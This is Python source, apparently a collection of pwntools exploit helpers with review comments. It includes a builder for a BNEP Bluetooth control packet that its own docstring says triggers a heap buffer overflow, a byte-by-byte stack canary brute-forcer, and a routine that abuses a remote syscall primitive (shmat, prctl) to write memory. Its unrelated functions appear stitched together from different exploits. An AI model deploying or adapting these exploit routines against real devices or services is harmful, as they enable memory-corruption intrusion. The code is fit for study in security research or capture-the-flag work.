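def get_full_packet(self):
    """Serialize this entry into its wire-format bytes.

    Returns:
        ``b''`` when there is no payload data at all; the raw ``data``
        untouched when ``crc`` equals the ``ErrorCodes.SNSIAS`` value;
        otherwise ``sid`` packed as one byte, followed by ``sub`` as one
        byte when it is set, followed by ``parameter`` verbatim when set.
    """
    if not self.data:
        return b''
    # Compare by value: ``is`` against an enum member's ``.value`` only
    # matches by accident (CPython caches small ints / interns some
    # literals) and silently fails to match for other values.
    if self.crc == ErrorCodes.SNSIAS.value:
        return self.data
    packet = pwn.p8(self.sid)
    if self.sub is not None:
        packet += pwn.p8(self.sub)
    if self.parameter is not None:
        # Appended as-is; assumed to already be bytes in wire format —
        # NOTE(review): confirm at the call sites that set ``parameter``.
        packet += self.parameter
    return packet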
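def construct_packet(content):
    """Build the BNEP control packet that carries ``content`` as payload.

    This is the packet used to reach the heap buffer overflow this script
    targets: a control-frame type byte with 0x80 (bit 7) OR-ed in, then the
    SETUP_CONNECTION_REQUEST message type, a single zero byte, and finally
    ``content`` verbatim. No length check is done on ``content``; the
    caller chooses the size that overflows.

    Params:
        content: the payload to embed, as ``bytes``.

    Returns:
        The packet as ``bytes``.
    """
    # Bytes literals throughout: pwn.p8() returns bytes on Python 3, and the
    # previous str + bytes concatenation raised TypeError there.
    header = pwn.p8(BNEP_FRAME_CONTROL | 128) + pwn.p8(BNEP_SETUP_CONN_REQ_MSG)
    return header + b"\x00" + content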
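def find_canary():
    """Recover the stack canary one byte at a time by brute force.

    For every canary position a fresh process of ``remote_binary`` is fed
    ``BUF_LEN`` filler bytes, the bytes recovered so far and one candidate
    byte; a reply containing "Stack Smashing Detected" means the candidate
    was wrong. Each process is closed whether or not the guess succeeded.

    Returns:
        The ``KEY_LEN`` recovered canary bytes.

    Raises:
        RuntimeError: if none of the 256 candidates passed for some position
            (the previous version silently returned a short canary in that
            case, which the caller would then misuse).
    """
    canary = b""
    for position in range(KEY_LEN):
        matched = None
        for guess in range(256):
            candidate = pwn.p8(guess)
            pr = pwn.process(remote_binary)
            try:
                pr.writelineafter("Please enter the length of the entry:\n> ",
                                  str(BUF_LEN + len(canary) + 1))
                pr.writelineafter("Input>", b"A" * BUF_LEN + canary + candidate)
                reply = pr.readline()
            finally:
                pr.close()
            # readline() yields bytes on Python 3; testing a str literal
            # against it raises TypeError instead of ever matching.
            if b"Stack Smashing Detected" in reply:
                continue
            matched = candidate
            break
        if matched is None:
            raise RuntimeError(
                "no candidate survived for canary byte %d" % position)
        canary += matched
    return canary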
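def writeb(offset, ch):
    """Write the byte ``ch`` into the shared-memory segment at ``offset``.

    Opens a fresh connection to ``HOST:PORT`` and drives the ``syscall``
    primitive: attach segment ``mid`` to learn its base address, derive the
    libc base from the hard-coded distance ``0xBB8000`` between the two
    mappings, find a byte equal to ``ch`` inside libc, then use
    prctl(PR_SET_NAME, src) followed by prctl(PR_GET_NAME, dst) to copy it
    from libc into the segment.

    Params:
        offset: byte offset inside the shared-memory segment to write at.
        ch: the byte value (0-255) to write; ``pwn.p8`` rejects others.

    Raises:
        StopIteration: if no byte equal to ``ch`` exists in the libc image.

    Side effects:
        ``pwn.context.log_level`` is lowered to 'INFO' for the duration of
        the call to silence per-byte syscall chatter and restored to its
        previous value afterwards (the previous version unconditionally set
        it to 'DEBUG' on exit). The connection is always closed, even if a
        syscall step raises.

    NOTE(review): per prctl(2), PR_GET_NAME copies the whole 16-byte task
    name, not a single byte, so the bytes after ``offset`` are overwritten
    as well — confirm callers write in ascending order.
    """
    p = pwn.remote(HOST, PORT)
    previous_level = pwn.context.log_level
    pwn.context.log_level = 'INFO'
    try:
        _, shm_base = syscall(p, SYS_shmat, mid, 0x0, 0)
        libc_base = shm_base - 0xBB8000
        src = libc_base + next(libc.search(pwn.p8(ch)))
        syscall(p, SYS_prctl, PR_SET_NAME, src, 0)
        syscall(p, SYS_prctl, PR_GET_NAME, shm_base + offset, 0)
    finally:
        pwn.context.log_level = previous_level
        p.close()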
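def _create_hszf_header(payload, sender, reciever):
    """Build the 8-byte big-endian HSZF header that precedes ``payload``.

    Layout (all fields big-endian, no padding):
        u32  len(payload) + 2   (presumably accounts for the u16 field below)
        u16  constant 1          (meaning not visible in this file)
        u8   sender
        u8   reciever

    Params:
        payload: the body that follows the header; only its length is used.
        sender, reciever: one-byte endpoint identifiers (0-255).

    Returns:
        The packed header as ``bytes``.

    Raises:
        struct.error: if a value does not fit its field, e.g. ``sender`` > 255
            (the pwntools-based version raised ValueError instead).
    """
    import struct  # stdlib: a fixed-layout header needs no pwntools packing
    # ">" selects big-endian with standard sizes, so 4 + 2 + 1 + 1 = 8 bytes.
    return struct.pack(">IHBB", len(payload) + 2, 1, sender, reciever)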